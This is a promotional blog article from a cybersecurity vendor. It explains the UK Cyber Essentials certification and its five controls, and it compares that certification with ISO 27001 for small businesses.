Cyber Essentials is a low-effort way for any SME to go from 0% to 98.5% protection against the most common cyber threats. In as little as 24 hours, you can receive Cyber Essentials certification. 

For some businesses, Cyber Essentials is mandatory. If you want to secure government or MOD contracts, it’s essential. 

PwC revealed that 85% of consumers “wish there were more companies they could trust with their data.” And in the B2B space, revenue in the Cybersecurity market is projected to reach US$185.70bn in 2024. So, you can bet that they’ll look hard at their potential vendors and suppliers, too.

And while Cyber Essentials isn’t a panacea for all cyber threats, it provides a valuable set of controls that deliver cost-effective cybersecurity for any business. With this foundation and protection from over 98% of common cyber threats, you can grow your business with confidence.

What’s preventing businesses from getting cyber essentials?

Only 31% of UK businesses undertook a cyber risk assessment in 2024. Those who haven’t often believe that:

  • It won't happen to them. Many businesses feel as though they fall under the radar and that data breaches are out of the question
  • Their business is too small. Some SMEs feel their business is too small and don't need to assess risk because their processes don't need improving
  • They don’t have enough budget. SMEs who don't understand the value of Cyber Essentials often feel the cost of a cybersecurity certification outweighs the benefits.

Sadly, any business can fall victim to a cyber-attack, so you can't put a price on cybersecurity. Cyber-attacks cost UK businesses £10,830, on average.

Who runs Cyber Essentials?


Cyber Essentials is the brainchild of the National Security Centre (NCSC). Founded in 2016, the NCSC combines expertise from CESG (the information assurance arm of GCHQ), the Centre for Cyber Assessment, CERT-UK, and the Centre for Protection of National Infrastructure. 

Want to protect your business from 98.5% of cyber threats? Get Cyber Essentials certified today.

What areas does Cyber Essentials cover?

Cyber Essentials covers five key areas of cybersecurity across your IT infrastructure, including common outliers, like thin clients, BYOD, and home working devices. The NCSC updates the certification regularly, as modern technology becomes commonplace, to keep pace with today’s working world.

  1. Firewalls. The boundary defences of your networks
  2. Secure configuration. Security measures for building or installing devices
  3. User access control. Managing user access and admin rights
  4. Malware protection. Protection from malicious software
  5. Patch management. Making sure all systems are updated correctly

How it works

Cyber Essentials is straightforward. All you have to do is complete a self-assessment questionnaire and submit it via an online portal. The assessment questionnaire is around 30 pages and is broken up into eight sections. It includes questions like:

A4.7. Have you configured your boundary firewalls so that they block all other services from being advertised on the internet? By default, most firewalls block all services from inside the network from being accessed from the internet, but you need to check your firewall settings.

On average, we’ve found that it takes small businesses around two weeks to complete an assessment. When you submit your assessment, the certification body reviews and grades your application. They have a ‘pass/fail’ system, so once you’ve passed, you’re good to go.

The five Cyber Essentials controls

Firewalls

Firewalls are your boundary defences. They prevent and stop unrestricted access to and from private networks. Set up correctly, boundary firewalls and internet gateways allow you to take control of your system, and who can access it. And it's easy to adjust your firewall as required. 

Secure configuration

Secure configuration involves configuring computer systems, networks, or software applications to minimise potential security risks – essential when managing your servers. Configuring computers and network devices is necessary to keep vulnerabilities at bay, and will help to prevent unauthorised activity. With this in place, you can rest assured that each device will only provide the minimum data and information when building or installing.

User access control

Get complete oversight when managing user access and admin rights. It’s easy to give multiple users administrator access for convenience, but it’s crucial to restrict it to prevent hackers from obtaining your information and data.

Malware protection

Protect your business from malicious software with antivirus support. This type of data breach can wreak havoc by corrupting crucial files and stealing confidential data. Not only that, but the software could potentially block access for ransom. 

Securing your business against a wide variety of malware is essential to protect your privacy, devices, and reputation.

Patch management

Update your software as soon as new patches become available. Patch management is critical to prevent hackers from exploiting known weaknesses and updating software and operating systems can fix vulnerabilities before they become a serious issue.

Want to know more about the different types of cybersecurity certifications available to UK businesses? Then check out our comprehensive guide to Cyber Essentials and beyond.

Cybersecurity certifications







Cyber Essentials vs ISO 27001 – key differences and benefits

cyber essentials vs iso 27001

Practising good cyber hygiene is essential for SMEs. To reduce risk, the UK government has developed guidelines on how to defend against threats.  

But it’s not always easy to know which standard is best for your business. Which should you get and why? To help you decide, let’s look at Cyber Essentials vs ISO 27001.

What is Cyber Essentials?

Cyber Essentials (CE) is a government-backed scheme proven to protect against common cyberattacks. It’s the minimum certification required for any government supplier responsible for handling personal information in the UK.

For SMEs, a CE certification demonstrates you’re serious about security – both to customers and regulators. 

Your security is evaluated across five categories. You must:

1. Configure and deploy a firewall

Your firewall needs to protect all devices – especially those connected to a public or untrustworthy network.

2. Use secure configurations for devices and software

Most devices and software have default settings aimed to make the device as open and available as possible. These can leave you open to attack. 

CE requires you to reconfigure your settings to maximise security. This includes using strong (not default) passwords and introducing extra layers of security such as two-factor authentication.

3. Make use of access control to prevent unauthorised access to data and services

Your employees should have the minimum access needed to perform their role. You’ll need to set up and define access levels for standard and administrative accounts to minimise risk. 

Unlock the future of MSP cybersecurity

Explore the opportunities and challenges facing MSPs in 2024. The CyberSmart MSP Survey reveals key strategies for achieving Complete Cyber Confidence.

4. Protect yourself against malware such as viruses

Malware, short for malicious software, is any computer program that causes harm to a device or its user. 

You must implement one of the following to meet these requirements:

  • Anti-malware solutions such as Windows Defender or Mac OS XProtect
  • A sandbox environment with restricted access to the rest of your files and network
  • A software whitelist to prevent users from running anything potentially harmful

5. Keep devices and software updated

Device manufacturers and software developers release updates (also known as patches). These are key to fixing known vulnerabilities in the software and must be installed when they become available.

Want to know more about the certifications available to you? Check out our guide to UK cybersecurity certifications.

What is ISO 27001?

ISO 27001 is an international standard for information security. It defines what’s required for establishing, implementing, maintaining, and improving an information security system. It’s much more comprehensive than Cyber Essentials. 

Rather than having specific guidelines to follow, ISO27001 has 14 controls that support compliance. 

1. Develop an information security policy

This provides direction to support your people. It should clearly lay out how to manage information in accordance with laws and business requirements. You should regularly review it to check it’s effective.

2. Implement and manage information security within your organisation

You need to provide a mechanism for managing information security, including coordinating responsibilities with employees and maintaining contact with authorities, third parties, and security providers.

The ISO 27001 provides the framework for managing information security in different aspects of your organisation. For example, teleworking or project management.

3. Provide training and awareness to HR

Ensure employees are aware of their responsibilities and given suitable training to fulfil them. You also need make sure any changes in employment conditions don’t affect security standards. 

4. Ensure organisational assets are secure

You should be able to identify and classify information security assets based on the sensitivity of the information they handle. You’ll also need to assign staff responsibilities for keeping devices secure. 

5. Make use of access control to protect information

Employees and third parties should have restricted access to your information. You’ll need formal processes to grant and revoke user rights. 

6. Protect the confidentiality and integrity of information 

Use encryption to protect the confidentiality and integrity of your data. This can help keep you safe by making the data unusable for hackers – even if they do manage to access your network.

7. Prevent unauthorised physical access to your workplace

Protect physical assets from unauthorised access and natural disasters. If these areas are breached, for example by forced entry or extreme weather, it could cause operational issues and expose sensitive data. 

8. Deploy secure configurations for operational infrastructure

You must securely configure devices, software, and operating systems. This might include:

  • Using antivirus software
  • Changing default settings to security-first ones
  • Gathering and recording evidence of security vulnerabilities 

9. Secure configurations for network infrastructure

All routers, switches, services, and software that make up your network must be configured to standards you set in a network services agreement. The agreement should identify security features and management requirements for the network, including: 

  • How to monitor and control network traffic
  • How to securely use applications and systems, e.g. by using a firewall

10. Prioritise security when acquiring, developing, and maintaining information systems

Consider security at every level of your information system. From the moment you set up a new system, you must have security controls to prevent the loss or misuse of information.

11. Ensure information security for activities by suppliers

Monitor all outsourced activities to confirm that your suppliers comply with the same security requirements you’ve laid out for your own organisation. 

12. Develop an effective approach for managing information security incidents

If an accident occurs or your systems are breached, you need to:

  • Communicate the details of the security incident and event quickly
  • Gather and preserve evidence for further analysis
  • Develop your information security process to prevent a repeat incident

13. Prevent information security failures from interrupting business continuity 

ISO 27001 provides a step-by-step process to continue operations after a breach. A key aspect of this is making sure staff can access information systems. 

14. Ensure compliance with information security policies and standards

Get guidance on how to adhere to standards and abide by the law so you stay compliant.

Cyber Essentials vs ISO 27001 – what are the main differences?

There are five basic differences when comparing the two security standards. 

  1. Flexibility – Cyber Essentials is prescriptive. You’ll get detailed guidance on what to do and how to do it. ISO 27001 requirements, on the other hand, are broader and leave more to your discretion
  2. Time –  It can take as little as a day to get CE accredited whereas ISO 27001 takes 6-9 months
  3. Audits – There’s no audit in the Cyber Essentials assessment, but for ISO 27001 you’ll have yearly maintenance audits and a recertification audit every 3 years
  4. Location – Cyber Essentials is only recognised in the UK, whereas ISO 27001 is international
  5. Level of difficulty – Cyber Essentials is very much an entry-level qualification that gives you a good foundation of knowledge. ISO 27001 is advanced in subject matter and assessment criteria

Cyber Essentials vs ISO 27001 – the benefits

Cyber Essentials is a great entry-level qualification with simple instructions and a fast certification process. It’s perfect for business that want to show a commitment to cyber hygiene and bid for government contracts.

ISO 27011 is an internationally recognised accreditation that showcases robust security practices – which may give you a competitive edge. 

Choosing your accreditation

The best certification for your business depends on your requirements, size, and infrastructure. Now that you know the key talking points in the Cyber Essentials vs ISO 27001 debate, hopefully you’ll be able to make a more informed decision.

Discover the latest cybersecurity insights for MSPs

Uncover the critical findings from the CyberSmart MSP Survey 2024. Learn how managed service providers are navigating the evolving cybersecurity landscape and what it means for your business.